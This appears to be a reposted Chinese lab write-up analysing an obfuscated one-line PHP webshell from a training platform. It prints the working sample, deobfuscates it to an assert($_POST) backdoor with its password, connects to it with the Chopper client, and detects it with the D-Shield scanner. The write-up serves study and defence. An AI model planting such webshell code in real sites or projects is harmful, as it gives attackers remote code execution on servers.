码迷,mamicode.com
首页 > Web开发 > 详细

WebShell代码分析溯源(二)

时间:2019-10-30 13:44:25      阅读:93      评论:0      收藏:0      [点我收藏+]

标签:php环境   span   调整   调试   实验   检测   php   shell   实验环境   

WebShell代码分析溯源(二) 

一、一句话变形马样本

<?php $POST[‘POST‘]=‘assert‘;$array[]=$POST;$array[0][‘POST‘]($_POST[‘assert‘]);?>

二、代码分析

1、调整代码格式

2、分析代码,首先先把”assert”字符串复制给POST数组,然后又把POST数组array数组,调试代码,搭建php环境(这里使用phpstudy)

  技术图片

3、发现结果输出为assert

  技术图片

4、这样最终一句话变形马就变成这样: <?php assert($_POST[‘assert‘]);?>,密码是assert

三、漏洞环境搭建

1、这里使用在线学习平台墨者学院中的实验环境(WebShell代码分析溯源(第2题)),地址: https://www.mozhe.cn/bug/detail/bFBlRkJteit1TlBLaEZMQWVPM0ZjZz09bW96aGUmozhe

2、代码环境,下载代码

  技术图片

3、找到webshell代码处,然后分析(上面有已经分析过了)

  技术图片

4、使用菜刀连接

  技术图片

四、后记

学习常用webshell扫描检测查杀工具---D盾,网址: http://www.d99net.net/

1、 使用D盾进行webshell查杀

  技术图片

 

WebShell代码分析溯源(二)

标签:php环境   span   调整   调试   实验   检测   php   shell   实验环境   

原文地址:https://www.cnblogs.com/yuzly/p/11743772.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!